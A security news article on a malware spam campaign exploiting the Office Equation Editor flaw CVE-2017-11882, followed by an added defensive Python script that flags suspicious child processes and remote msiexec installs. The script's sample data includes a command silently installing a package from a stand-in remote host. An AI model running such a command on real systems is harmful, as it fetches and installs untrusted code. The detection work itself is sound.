Malware spam campaign targets Office vulnerability (CVE-2017-11882)


Microsoft is warning about a malware spam campaign targeting an Office vulnerability patched in 2017.

Microsoft’s Security Intelligence team sent out a tweet on Friday warning about an increase in campaign activity over the past few weeks. As part of the campaign, Microsoft said, the spam emails deliver malicious files used to exploit CVE-2017-11882.


Microsoft added that attackers can run malicious code even without user interaction.

Microsoft patched the Office memory corruption vulnerability CVE-2017-11882 in November 2017, and it was later linked to the Equation Editor component. However, this has not deterred attacks like this one from exploiting organizations that are not up to date on their patching.

Readers may also refer to several other campaigns that have exploited CVE-2017-11882. In one case, an alleged Chinese-linked cyber espionage campaign, Temp.Periscope, targeted engineering and maritime industries in early 2018.

Also, Trend Micro researchers found attackers exploiting the same patched bug by abusing the Windows Installer service, msiexec.exe, to deliver LokiBot malware.

Finally, security researchers from FireEye spotted hackers exploiting more recently patched Microsoft Office vulnerabilities to spread Zyklon HTTP malware.
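
For defenders hunting for the behaviour described above, the following added example (not from Microsoft, Trend Micro or the original article) scans process-creation records for two signs: the Equation Editor process spawning a child, and msiexec.exe installing from a remote URL. The executable name EQNEDT32.EXE, the Sysmon-style field names and the sample records are assumptions or constructed values that do not appear in the article.

```python
import json
import ntpath
import re

# Known file name of the Equation Editor component (assumption: not named in the article).
EQUATION_EDITOR = "eqnedt32.exe"
# msiexec install switch (/i or /package, "-" also accepted) followed by an http(s) source.
REMOTE_MSI = re.compile(r'(?:^|\s)[/-](?:i|package)\s+"?https?://', re.IGNORECASE)

def base(path):
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip().strip('"')).lower()

def flag_events(lines):
    """Return (line_number, reason) for each suspicious process-creation record."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records rather than abort the hunt
        if not isinstance(ev, dict):
            continue
        image = base(str(ev.get("Image", "")))
        parent = base(str(ev.get("ParentImage", "")))
        cmd = str(ev.get("CommandLine", ""))
        if parent == EQUATION_EDITOR:  # the equation editor normally has no children
            hits.append((n, f"Equation Editor spawned {image}"))
        if image == "msiexec.exe" and REMOTE_MSI.search(cmd):
            hits.append((n, "msiexec.exe installing from a remote URL"))
    return hits

# Constructed sample records (field names follow Sysmon Event ID 1; values are made up).
SAMPLE = [
    r'{"Image":"C:\\Windows\\System32\\msiexec.exe","ParentImage":"C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE","CommandLine":"msiexec /q /i http://example.invalid/a.msi"}',
    r'{"Image":"C:\\Windows\\System32\\msiexec.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"msiexec /i \"C:\\Users\\a\\Downloads\\tool.msi\" /qn"}',
    r'{"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files (x86)\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE","CommandLine":"cmd.exe"}',
    'truncated record, not JSON',
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE):
        print(hit)
```

The local install on line 2 is not flagged, which keeps routine software deployment out of the results; tune the rules to the telemetry source actually in use.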